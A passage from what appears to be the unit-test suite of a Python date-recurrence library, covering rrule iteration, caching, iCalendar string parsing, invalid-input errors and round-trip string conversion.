datetime(1997, 9, 20, 9, 0)])
def testXAfterInc(self):
self.assertEqual(list(rrule(DAILY,
dtstart=datetime(1997, 9, 2, 9, 0))
.xafter(datetime(1997, 9, 8, 9, 0), count=12, inc=True)),
[datetime(1997, 9, 8, 9, 0),
datetime(1997, 9, 9, 9, 0),
datetime(1997, 9, 10, 9, 0),
datetime(1997, 9, 11, 9, 0),
datetime(1997, 9, 12, 9, 0),
datetime(1997, 9, 13, 9, 0),
datetime(1997, 9, 14, 9, 0),
datetime(1997, 9, 15, 9, 0),
datetime(1997, 9, 16, 9, 0),
datetime(1997, 9, 17, 9, 0),
datetime(1997, 9, 18, 9, 0),
datetime(1997, 9, 19, 9, 0)])
def testBetween(self):
self.assertEqual(rrule(DAILY,
#count=5,
dtstart=datetime(1997, 9, 2, 9, 0))
.between(datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 6, 9, 0)),
[datetime(1997, 9, 3, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 5, 9, 0)])
def testBetweenInc(self):
self.assertEqual(rrule(DAILY,
#count=5,
dtstart=datetime(1997, 9, 2, 9, 0))
.between(datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 6, 9, 0), inc=True),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 3, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 5, 9, 0),
datetime(1997, 9, 6, 9, 0)])
def testCachePre(self):
rr = rrule(DAILY, count=15, cache=True,
dtstart=datetime(1997, 9, 2, 9, 0))
self.assertEqual(list(rr),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 3, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 5, 9, 0),
datetime(1997, 9, 6, 9, 0),
datetime(1997, 9, 7, 9, 0),
datetime(1997, 9, 8, 9, 0),
datetime(1997, 9, 9, 9, 0),
datetime(1997, 9, 10, 9, 0),
datetime(1997, 9, 11, 9, 0),
datetime(1997, 9, 12, 9, 0),
datetime(1997, 9, 13, 9, 0),
datetime(1997, 9, 14, 9, 0),
datetime(1997, 9, 15, 9, 0),
datetime(1997, 9, 16, 9, 0)])
def testCachePost(self):
rr = rrule(DAILY, count=15, cache=True,
dtstart=datetime(1997, 9, 2, 9, 0))
for x in rr: pass
self.assertEqual(list(rr),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 3, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 5, 9, 0),
datetime(1997, 9, 6, 9, 0),
datetime(1997, 9, 7, 9, 0),
datetime(1997, 9, 8, 9, 0),
datetime(1997, 9, 9, 9, 0),
datetime(1997, 9, 10, 9, 0),
datetime(1997, 9, 11, 9, 0),
datetime(1997, 9, 12, 9, 0),
datetime(1997, 9, 13, 9, 0),
datetime(1997, 9, 14, 9, 0),
datetime(1997, 9, 15, 9, 0),
datetime(1997, 9, 16, 9, 0)])
def testCachePostInternal(self):
rr = rrule(DAILY, count=15, cache=True,
dtstart=datetime(1997, 9, 2, 9, 0))
for x in rr: pass
self.assertEqual(rr._cache,
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 3, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 5, 9, 0),
datetime(1997, 9, 6, 9, 0),
datetime(1997, 9, 7, 9, 0),
datetime(1997, 9, 8, 9, 0),
datetime(1997, 9, 9, 9, 0),
datetime(1997, 9, 10, 9, 0),
datetime(1997, 9, 11, 9, 0),
datetime(1997, 9, 12, 9, 0),
datetime(1997, 9, 13, 9, 0),
datetime(1997, 9, 14, 9, 0),
datetime(1997, 9, 15, 9, 0),
datetime(1997, 9, 16, 9, 0)])
def testCachePreContains(self):
rr = rrule(DAILY, count=3, cache=True,
dtstart=datetime(1997, 9, 2, 9, 0))
self.assertEqual(datetime(1997, 9, 3, 9, 0) in rr, True)
def testCachePostContains(self):
rr = rrule(DAILY, count=3, cache=True,
dtstart=datetime(1997, 9, 2, 9, 0))
for x in rr: pass
self.assertEqual(datetime(1997, 9, 3, 9, 0) in rr, True)
def testStr(self):
self.assertEqual(list(rrulestr(
"DTSTART:19970902T090000\n"
"RRULE:FREQ=YEARLY;COUNT=3\n"
)),
[datetime(1997, 9, 2, 9, 0),
datetime(1998, 9, 2, 9, 0),
datetime(1999, 9, 2, 9, 0)])
def testStrType(self):
self.assertEqual(isinstance(rrulestr(
"DTSTART:19970902T090000\n"
"RRULE:FREQ=YEARLY;COUNT=3\n"
), rrule), True)
def testStrForceSetType(self):
self.assertEqual(isinstance(rrulestr(
"DTSTART:19970902T090000\n"
"RRULE:FREQ=YEARLY;COUNT=3\n"
, forceset=True), rruleset), True)
def testStrSetType(self):
self.assertEqual(isinstance(rrulestr(
"DTSTART:19970902T090000\n"
"RRULE:FREQ=YEARLY;COUNT=2;BYDAY=TU\n"
"RRULE:FREQ=YEARLY;COUNT=1;BYDAY=TH\n"
), rruleset), True)
def testStrCase(self):
self.assertEqual(list(rrulestr(
"dtstart:19970902T090000\n"
"rrule:freq=yearly;count=3\n"
)),
[datetime(1997, 9, 2, 9, 0),
datetime(1998, 9, 2, 9, 0),
datetime(1999, 9, 2, 9, 0)])
def testStrSpaces(self):
self.assertEqual(list(rrulestr(
" DTSTART:19970902T090000 "
" RRULE:FREQ=YEARLY;COUNT=3 "
)),
[datetime(1997, 9, 2, 9, 0),
datetime(1998, 9, 2, 9, 0),
datetime(1999, 9, 2, 9, 0)])
def testStrSpacesAndLines(self):
self.assertEqual(list(rrulestr(
" DTSTART:19970902T090000 \n"
" \n"
" RRULE:FREQ=YEARLY;COUNT=3 \n"
)),
[datetime(1997, 9, 2, 9, 0),
datetime(1998, 9, 2, 9, 0),
datetime(1999, 9, 2, 9, 0)])
def testStrNoDTStart(self):
self.assertEqual(list(rrulestr(
"RRULE:FREQ=YEARLY;COUNT=3\n"
, dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1998, 9, 2, 9, 0),
datetime(1999, 9, 2, 9, 0)])
def testStrValueOnly(self):
self.assertEqual(list(rrulestr(
"FREQ=YEARLY;COUNT=3\n"
, dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1998, 9, 2, 9, 0),
datetime(1999, 9, 2, 9, 0)])
def testStrUnfold(self):
self.assertEqual(list(rrulestr(
"FREQ=YEA\n RLY;COUNT=3\n", unfold=True,
dtstart=datetime(1997, 9, 2, 9, 0))),
[datetime(1997, 9, 2, 9, 0),
datetime(1998, 9, 2, 9, 0),
datetime(1999, 9, 2, 9, 0)])
def testStrSet(self):
self.assertEqual(list(rrulestr(
"DTSTART:19970902T090000\n"
"RRULE:FREQ=YEARLY;COUNT=2;BYDAY=TU\n"
"RRULE:FREQ=YEARLY;COUNT=1;BYDAY=TH\n"
)),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 9, 9, 0)])
def testStrSetDate(self):
self.assertEqual(list(rrulestr(
"DTSTART:19970902T090000\n"
"RRULE:FREQ=YEARLY;COUNT=1;BYDAY=TU\n"
"RDATE:19970904T090000\n"
"RDATE:19970909T090000\n"
)),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 4, 9, 0),
datetime(1997, 9, 9, 9, 0)])
def testStrSetExRule(self):
self.assertEqual(list(rrulestr(
"DTSTART:19970902T090000\n"
"RRULE:FREQ=YEARLY;COUNT=6;BYDAY=TU,TH\n"
"EXRULE:FREQ=YEARLY;COUNT=3;BYDAY=TH\n"
)),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 9, 9, 0),
datetime(1997, 9, 16, 9, 0)])
def testStrSetExDate(self):
self.assertEqual(list(rrulestr(
"DTSTART:19970902T090000\n"
"RRULE:FREQ=YEARLY;COUNT=6;BYDAY=TU,TH\n"
"EXDATE:19970904T090000\n"
"EXDATE:19970911T090000\n"
"EXDATE:19970918T090000\n"
)),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 9, 9, 0),
datetime(1997, 9, 16, 9, 0)])
def testStrSetDateAndExDate(self):
self.assertEqual(list(rrulestr(
"DTSTART:19970902T090000\n"
"RDATE:19970902T090000\n"
"RDATE:19970904T090000\n"
"RDATE:19970909T090000\n"
"RDATE:19970911T090000\n"
"RDATE:19970916T090000\n"
"RDATE:19970918T090000\n"
"EXDATE:19970904T090000\n"
"EXDATE:19970911T090000\n"
"EXDATE:19970918T090000\n"
)),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 9, 9, 0),
datetime(1997, 9, 16, 9, 0)])
def testStrSetDateAndExRule(self):
self.assertEqual(list(rrulestr(
"DTSTART:19970902T090000\n"
"RDATE:19970902T090000\n"
"RDATE:19970904T090000\n"
"RDATE:19970909T090000\n"
"RDATE:19970911T090000\n"
"RDATE:19970916T090000\n"
"RDATE:19970918T090000\n"
"EXRULE:FREQ=YEARLY;COUNT=3;BYDAY=TH\n"
)),
[datetime(1997, 9, 2, 9, 0),
datetime(1997, 9, 9, 9, 0),
datetime(1997, 9, 16, 9, 0)])
def testStrKeywords(self):
self.assertEqual(list(rrulestr(
"DTSTART:19970902T090000\n"
"RRULE:FREQ=YEARLY;COUNT=3;INTERVAL=3;"
"BYMONTH=3;BYWEEKDAY=TH;BYMONTHDAY=3;"
"BYHOUR=3;BYMINUTE=3;BYSECOND=3\n"
)),
[datetime(2033, 3, 3, 3, 3, 3),
datetime(2039, 3, 3, 3, 3, 3),
datetime(2072, 3, 3, 3, 3, 3)])
def testStrNWeekDay(self):
self.assertEqual(list(rrulestr(
"DTSTART:19970902T090000\n"
"RRULE:FREQ=YEARLY;COUNT=3;BYDAY=1TU,-1TH\n"
)),
[datetime(1997, 12, 25, 9, 0),
datetime(1998, 1, 6, 9, 0),
datetime(1998, 12, 31, 9, 0)])
def testStrUntil(self):
self.assertEqual(list(rrulestr(
"DTSTART:19970902T090000\n"
"RRULE:FREQ=YEARLY;"
"UNTIL=19990101T000000;BYDAY=1TU,-1TH\n"
)),
[datetime(1997, 12, 25, 9, 0),
datetime(1998, 1, 6, 9, 0),
datetime(1998, 12, 31, 9, 0)])
def testStrValueDatetime(self):
rr = rrulestr("DTSTART;VALUE=DATE-TIME:19970902T090000\n"
"RRULE:FREQ=YEARLY;COUNT=2")
self.assertEqual(list(rr), [datetime(1997, 9, 2, 9, 0, 0),
datetime(1998, 9, 2, 9, 0, 0)])
def testStrValueDate(self):
rr = rrulestr("DTSTART;VALUE=DATE:19970902\n"
"RRULE:FREQ=YEARLY;COUNT=2")
self.assertEqual(list(rr), [datetime(1997, 9, 2, 0, 0, 0),
datetime(1998, 9, 2, 0, 0, 0)])
def testStrInvalidUntil(self):
with self.assertRaises(ValueError):
list(rrulestr("DTSTART:19970902T090000\n"
"RRULE:FREQ=YEARLY;"
"UNTIL=TheCowsComeHome;BYDAY=1TU,-1TH\n"))
def testStrEmptyByDay(self):
with self.assertRaises(ValueError):
list(rrulestr("DTSTART:19970902T090000\n"
"FREQ=WEEKLY;"
"BYDAY=;" # This part is invalid
"WKST=SU"))
def testStrInvalidByDay(self):
with self.assertRaises(ValueError):
list(rrulestr("DTSTART:19970902T090000\n"
"FREQ=WEEKLY;"
"BYDAY=-1OK;" # This part is invalid
"WKST=SU"))
def testBadBySetPos(self):
self.assertRaises(ValueError,
rrule, MONTHLY,
count=1,
bysetpos=0,
dtstart=datetime(1997, 9, 2, 9, 0))
def testBadBySetPosMany(self):
self.assertRaises(ValueError,
rrule, MONTHLY,
count=1,
bysetpos=(-1, 0, 1),
dtstart=datetime(1997, 9, 2, 9, 0))
# Tests to ensure that str(rrule) works
def testToStrYearly(self):
rule = rrule(YEARLY, count=3, dtstart=datetime(1997, 9, 2, 9, 0))
self._rrulestr_reverse_test(rule)
def testToStrYearlyInterval(self):
rule = rrule(YEARLY, count=3, interval=2,
dtstart=datetime(1997, 9, 2, 9, 0))
self._rrulestr_reverse_test(rule)
def testToStrYearlyByMonth(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
bymonth=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByMonthDay(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
bymonthday=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByMonthAndMonthDay(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
bymonth=(1, 3),
bymonthday=(5, 7),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByWeekDay(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByNWeekDay(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByNWeekDayLarge(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byweekday=(TU(3), TH(-3)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByMonthAndWeekDay(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
bymonth=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByMonthAndNWeekDay(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
bymonth=(1, 3),
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByMonthAndNWeekDayLarge(self):
# This is interesting because the TH(-3) ends up before
# the TU(3).
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
bymonth=(1, 3),
byweekday=(TU(3), TH(-3)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByMonthDayAndWeekDay(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByMonthAndMonthDayAndWeekDay(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
bymonth=(1, 3),
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByYearDay(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=4,
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByYearDayNeg(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=4,
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByMonthAndYearDay(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=4,
bymonth=(4, 7),
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByMonthAndYearDayNeg(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=4,
bymonth=(4, 7),
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByWeekNo(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byweekno=20,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByWeekNoAndWeekDay(self):
# That's a nice one. The first days of week number one
# may be in the last year.
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byweekno=1,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByWeekNoAndWeekDayLarge(self):
# Another nice test. The last days of week number 52/53
# may be in the next year.
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byweekno=52,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByWeekNoAndWeekDayLast(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byweekno=-1,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByEaster(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byeaster=0,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByEasterPos(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byeaster=1,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByEasterNeg(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byeaster=-1,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByWeekNoAndWeekDay53(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byweekno=53,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByHour(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byhour=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByMinute(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyBySecond(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByHourAndMinute(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByHourAndSecond(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byhour=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByMinuteAndSecond(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyByHourAndMinuteAndSecond(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrYearlyBySetPos(self):
self._rrulestr_reverse_test(rrule(YEARLY,
count=3,
bymonthday=15,
byhour=(6, 18),
bysetpos=(3, -3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthly(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyInterval(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
interval=2,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyIntervalLarge(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
interval=18,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByMonth(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
bymonth=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByMonthDay(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
bymonthday=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByMonthAndMonthDay(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
bymonth=(1, 3),
bymonthday=(5, 7),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByWeekDay(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
# Third Monday of the month
self.assertEqual(rrule(MONTHLY,
byweekday=(MO(+3)),
dtstart=datetime(1997, 9, 1)).between(datetime(1997,
9,
1),
datetime(1997,
12,
1)),
[datetime(1997, 9, 15, 0, 0),
datetime(1997, 10, 20, 0, 0),
datetime(1997, 11, 17, 0, 0)])
def testToStrMonthlyByNWeekDay(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByNWeekDayLarge(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byweekday=(TU(3), TH(-3)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByMonthAndWeekDay(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
bymonth=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByMonthAndNWeekDay(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
bymonth=(1, 3),
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByMonthAndNWeekDayLarge(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
bymonth=(1, 3),
byweekday=(TU(3), TH(-3)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByMonthDayAndWeekDay(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByMonthAndMonthDayAndWeekDay(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
bymonth=(1, 3),
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByYearDay(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=4,
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByYearDayNeg(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=4,
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByMonthAndYearDay(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=4,
bymonth=(4, 7),
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByMonthAndYearDayNeg(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=4,
bymonth=(4, 7),
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByWeekNo(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byweekno=20,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByWeekNoAndWeekDay(self):
# That's a nice one. The first days of week number one
# may be in the last year.
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byweekno=1,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByWeekNoAndWeekDayLarge(self):
# Another nice test. The last days of week number 52/53
# may be in the next year.
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byweekno=52,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByWeekNoAndWeekDayLast(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byweekno=-1,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByWeekNoAndWeekDay53(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byweekno=53,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByEaster(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byeaster=0,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByEasterPos(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byeaster=1,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByEasterNeg(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byeaster=-1,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByHour(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byhour=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByMinute(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyBySecond(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByHourAndMinute(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByHourAndSecond(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byhour=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByMinuteAndSecond(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyByHourAndMinuteAndSecond(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
byhour=(6, 18),
byminute=(6, 18),
bysecond=(6, 18),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrMonthlyBySetPos(self):
self._rrulestr_reverse_test(rrule(MONTHLY,
count=3,
bymonthday=(13, 17),
byhour=(6, 18),
bysetpos=(3, -3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeekly(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyInterval(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
interval=2,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyIntervalLarge(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
interval=20,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByMonth(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
bymonth=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByMonthDay(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
bymonthday=(1, 3),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByMonthAndMonthDay(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
bymonth=(1, 3),
bymonthday=(5, 7),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByWeekDay(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByNWeekDay(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByMonthAndWeekDay(self):
# This test is interesting, because it crosses the year
# boundary in a weekly period to find day '1' as a
# valid recurrence.
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
bymonth=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByMonthAndNWeekDay(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
bymonth=(1, 3),
byweekday=(TU(1), TH(-1)),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByMonthDayAndWeekDay(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByMonthAndMonthDayAndWeekDay(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
bymonth=(1, 3),
bymonthday=(1, 3),
byweekday=(TU, TH),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByYearDay(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=4,
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByYearDayNeg(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=4,
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByMonthAndYearDay(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=4,
bymonth=(1, 7),
byyearday=(1, 100, 200, 365),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByMonthAndYearDayNeg(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=4,
bymonth=(1, 7),
byyearday=(-365, -266, -166, -1),
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByWeekNo(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byweekno=20,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByWeekNoAndWeekDay(self):
# That's a nice one. The first days of week number one
# may be in the last year.
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byweekno=1,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByWeekNoAndWeekDayLarge(self):
# Another nice test. The last days of week number 52/53
# may be in the next year.
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byweekno=52,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByWeekNoAndWeekDayLast(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byweekno=-1,
byweekday=SU,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByWeekNoAndWeekDay53(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byweekno=53,
byweekday=MO,
dtstart=datetime(1997, 9, 2, 9, 0)))
def testToStrWeeklyByEaster(self):
self._rrulestr_reverse_test(rrule(WEEKLY,
count=3,
byeaster=0,
dtstart=datetime(1997, 9, 2, 9, 0)))
